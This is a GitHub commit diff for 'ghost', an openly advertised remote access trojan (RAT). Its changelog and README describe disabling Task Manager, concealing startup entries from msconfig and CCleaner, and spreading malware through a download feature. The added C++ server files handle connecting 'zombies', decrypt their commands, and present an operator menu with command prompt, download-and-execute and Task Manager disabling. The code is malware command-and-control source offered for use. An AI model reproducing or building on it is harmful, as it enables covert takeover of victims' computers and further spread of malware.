1.0.4

- Task Manager Killer added - Commands automatically timeout - Cleaned up and organized some modules
AHXR · Jan 21, 2018 · b9dd96c · b9dd96c
1 parent 901a49e
commit b9dd96c
Show file tree

Hide file tree

Showing 17 changed files with 1,191 additions and 436 deletions.
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -1,3 +1,9 @@
+1.0.4 (1/21/2018)
+
+- Task Manager Killer added
+- Commands automatically timeout
+- Cleaned up and organized some modules
+
 1.0.3b (12/17/2017)
 
 - Refresh crashing fixed

diff --git a/README.md b/README.md
@@ -29,6 +29,7 @@ zombie.exe 127.0.0.1 27015
 - Installed Antivirus shown to server
 - Easily spread malware through download feature
 - Startup info doesn't show in msconfig or other startup checking programs like CCleaner
+- Disable Task Manager
 
 ---
 

diff --git a/_src/server/AssemblyInfo.cpp b/_src/server/AssemblyInfo.cpp
@@ -0,0 +1,58 @@
+/*
+	@title
+		ghost
+	@author
+		AHXR (https://github.com/AHXR)
+	@copyright
+		2018
+
+	ghost is free software: you can redistribute it and/or modify
+	it under the terms of the GNU General Public License as published by
+	the Free Software Foundation, either version 3 of the License, or
+	(at your option) any later version.
+
+	ghost is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	GNU General Public License for more details.
+
+	You should have received a copy of the GNU General Public License
+	along with ghost.  If not, see <http://www.gnu.org/licenses/>.
+*/
+//=======================================================
+using namespace System;
+using namespace System::Reflection;
+using namespace System::Runtime::CompilerServices;
+using namespace System::Runtime::InteropServices;
+using namespace System::Security::Permissions;
+
+//
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+//
+[assembly:AssemblyTitleAttribute(L"#ghost")];
+[assembly:AssemblyDescriptionAttribute(L"RAT (github.com/AHXR)")];
+[assembly:AssemblyConfigurationAttribute(L"")];
+[assembly:AssemblyCompanyAttribute(L"AHXR")];
+[assembly:AssemblyProductAttribute(L"#ghost (github.com/AHXR)")];
+[assembly:AssemblyCopyrightAttribute(L"Copyright (c) 2018")];
+[assembly:AssemblyTrademarkAttribute(L"")];
+[assembly:AssemblyCultureAttribute(L"")];
+
+//
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version
+//      Build Number
+//      Revision
+//
+// You can specify all the value or you can default the Revision and Build Numbers
+// by using the '*' as shown below:
+
+[assembly:AssemblyVersionAttribute("1.0.*")];
+
+[assembly:ComVisible(false)];
+
+[assembly:CLSCompliantAttribute(true)];
diff --git a/_src/server/INIReader.cpp b/_src/server/INIReader.cpp
@@ -0,0 +1,82 @@
+// Read an INI file into easy-to-access name/value pairs.
+
+// inih and INIReader are released under the New BSD license (see LICENSE.txt).
+// Go to the project home page for more info:
+//
+// https://github.com/benhoyt/inih
+
+#include <algorithm>
+#include <cctype>
+#include <cstdlib>
+#include "ini.h"
+#include "INIReader.h"
+
+using std::string;
+
+INIReader::INIReader(const string& filename)
+{
+    _error = ini_parse(filename.c_str(), ValueHandler, this);
+}
+
+int INIReader::ParseError() const
+{
+    return _error;
+}
+
+string INIReader::Get(const string& section, const string& name, const string& default_value) const
+{
+    string key = MakeKey(section, name);
+    // Use _values.find() here instead of _values.at() to support pre C++11 compilers
+    return _values.count(key) ? _values.find(key)->second : default_value;
+}
+
+long INIReader::GetInteger(const string& section, const string& name, long default_value) const
+{
+    string valstr = Get(section, name, "");
+    const char* value = valstr.c_str();
+    char* end;
+    // This parses "1234" (decimal) and also "0x4D2" (hex)
+    long n = strtol(value, &end, 0);
+    return end > value ? n : default_value;
+}
+
+double INIReader::GetReal(const string& section, const string& name, double default_value) const
+{
+    string valstr = Get(section, name, "");
+    const char* value = valstr.c_str();
+    char* end;
+    double n = strtod(value, &end);
+    return end > value ? n : default_value;
+}
+
+bool INIReader::GetBoolean(const string& section, const string& name, bool default_value) const
+{
+    string valstr = Get(section, name, "");
+    // Convert to lower case to make string comparisons case-insensitive
+    std::transform(valstr.begin(), valstr.end(), valstr.begin(), ::tolower);
+    if (valstr == "true" || valstr == "yes" || valstr == "on" || valstr == "1")
+        return true;
+    else if (valstr == "false" || valstr == "no" || valstr == "off" || valstr == "0")
+        return false;
+    else
+        return default_value;
+}
+
+string INIReader::MakeKey(const string& section, const string& name)
+{
+    string key = section + "=" + name;
+    // Convert to lower case to make section/name lookups case-insensitive
+    std::transform(key.begin(), key.end(), key.begin(), ::tolower);
+    return key;
+}
+
+int INIReader::ValueHandler(void* user, const char* section, const char* name,
+                            const char* value)
+{
+    INIReader* reader = (INIReader*)user;
+    string key = MakeKey(section, name);
+    if (reader->_values[key].size() > 0)
+        reader->_values[key] += "\n";
+    reader->_values[key] += value;
+    return 1;
+}
diff --git a/_src/server/INIReader.h b/_src/server/INIReader.h
@@ -0,0 +1,53 @@
+// Read an INI file into easy-to-access name/value pairs.
+
+// inih and INIReader are released under the New BSD license (see LICENSE.txt).
+// Go to the project home page for more info:
+//
+// https://github.com/benhoyt/inih
+
+#ifndef __INIREADER_H__
+#define __INIREADER_H__
+
+#include <map>
+#include <string>
+
+// Read an INI file into easy-to-access name/value pairs. (Note that I've gone
+// for simplicity here rather than speed, but it should be pretty decent.)
+class INIReader
+{
+public:
+    // Construct INIReader and parse given filename. See ini.h for more info
+    // about the parsing.
+    INIReader(const std::string& filename);
+
+    // Return the result of ini_parse(), i.e., 0 on success, line number of
+    // first error on parse error, or -1 on file open error.
+    int ParseError() const;
+
+    // Get a string value from INI file, returning default_value if not found.
+    std::string Get(const std::string& section, const std::string& name,
+                    const std::string& default_value) const;
+
+    // Get an integer (long) value from INI file, returning default_value if
+    // not found or not a valid integer (decimal "1234", "-1234", or hex "0x4d2").
+    long GetInteger(const std::string& section, const std::string& name, long default_value) const;
+
+    // Get a real (floating point double) value from INI file, returning
+    // default_value if not found or not a valid floating point value
+    // according to strtod().
+    double GetReal(const std::string& section, const std::string& name, double default_value) const;
+
+    // Get a boolean value from INI file, returning default_value if not found or if
+    // not a valid true/false value. Valid true values are "true", "yes", "on", "1",
+    // and valid false values are "false", "no", "off", "0" (not case sensitive).
+    bool GetBoolean(const std::string& section, const std::string& name, bool default_value) const;
+
+private:
+    int _error;
+    std::map<std::string, std::string> _values;
+    static std::string MakeKey(const std::string& section, const std::string& name);
+    static int ValueHandler(void* user, const char* section, const char* name,
+                            const char* value);
+};
+
+#endif  // __INIREADER_H__
diff --git a/_src/server/callbacks.h b/_src/server/callbacks.h
@@ -0,0 +1,55 @@
+/*
+	@title
+		ghost
+	@author
+		AHXR (https://github.com/AHXR)
+	@copyright
+		2018
+
+	ghost is free software: you can redistribute it and/or modify
+	it under the terms of the GNU General Public License as published by
+	the Free Software Foundation, either version 3 of the License, or
+	(at your option) any later version.
+
+	ghost is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	GNU General Public License for more details.
+
+	You should have received a copy of the GNU General Public License
+	along with ghost.  If not, see <http://www.gnu.org/licenses/>.
+*/
+//=======================================================
+void onServerClientConnect(SOCKET clientSocket, CLIENTDATA info);
+void onServerRecData(SOCKET clientSocket, CLIENTDATA info, char * data);
+
+void onServerClientConnect(SOCKET clientSocket, CLIENTDATA info) {
+	server::gui::taskbarIcon->BalloonTipText = L"A new zombie has connected!";
+	server::gui::taskbarIcon->ShowBalloonTip(2000);
+}
+
+void onServerRecData(SOCKET clientSocket, CLIENTDATA info, char * data) {
+	string s_data = data;
+	s_data = unencryptCMD(s_data);
+	strcpy(data, s_data.data());
+
+	if (b_waiting) {
+		LOG("[RESPONSE]\n%s", data);
+
+		server::gui::taskbarIcon->BalloonTipText = L"You have received a response from your zombie.";
+		server::gui::taskbarIcon->ShowBalloonTip(2000);
+
+		b_waiting = false;
+	}
+	else {
+		int	i_zombie_idx;
+		char * new_data = new char[strlen(data) + 1];
+
+		ghostlib::addZombie(ghostlib::_clientData{ clientSocket, info });
+		i_zombie_idx = ghostlib::getZombieIndex(clientSocket);
+
+		strcpy(new_data, data);
+
+		ghostlib::parseZombie(clientSocket, i_zombie_idx, new_data);
+	}
+}
diff --git a/_src/server/config.h b/_src/server/config.h
@@ -0,0 +1,48 @@
+/*
+	@title
+		ghost
+	@author
+		AHXR (https://github.com/AHXR)
+	@copyright
+		2018
+
+	ghost is free software: you can redistribute it and/or modify
+	it under the terms of the GNU General Public License as published by
+	the Free Software Foundation, either version 3 of the License, or
+	(at your option) any later version.
+
+	ghost is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	GNU General Public License for more details.
+
+	You should have received a copy of the GNU General Public License
+	along with ghost.  If not, see <http://www.gnu.org/licenses/>.
+*/
+//=======================================================
+#define					DEFAULT_BUFF		19056
+#define					AHXRLOGGER_PLUGIN // https://github.com/AHXR/ahxrlogger
+
+#define					SHOW_CONSOLE()		{ AllocConsole(); LOG("%s\n\n", c_ascii); b_hidden = false; }
+#define					HIDE_CONSOLE()		{ FreeConsole(); b_hidden = true; }
+#define					SHOW_MENU()			{ LOG("\nSelect an option: \
+\n1) Zombies \
+\n2) Configuration \
+\n3) Refresh \
+\n4) Minimize \
+\n5) Exit"); cin >> s_option; \
+											}
+#define					SHOW_CLIENT_OPT()	{ LOG("1) Command Prompt\
+\n2) Download & Execute\
+\n3) Disable Task Manager"); \
+											}
+#define					SHOW_CONFIG()		{	LOG("[COLOR:BROWN]IP: %s", real_ip().c_str()); \
+												LOG("[COLOR:BROWN]Port: %s", c_port.c_str()); \
+												LOG("-----------------------"); \
+											}
+#define					SHOW_GHOST()		{ system("CLS"); LOG("%s\n\n", c_ascii); }
+#define					GO_BACK()			{ LOG("[COLOR:GREEN]0) [Back to Main Menu]"); }
+
+#define					GHOST_CONFIG		"ghost.conf"
+#define					TIMEOUT_WARNING		100 // Default Warning
+#define					TIMEOUT_EXIT		200 // Default Timeout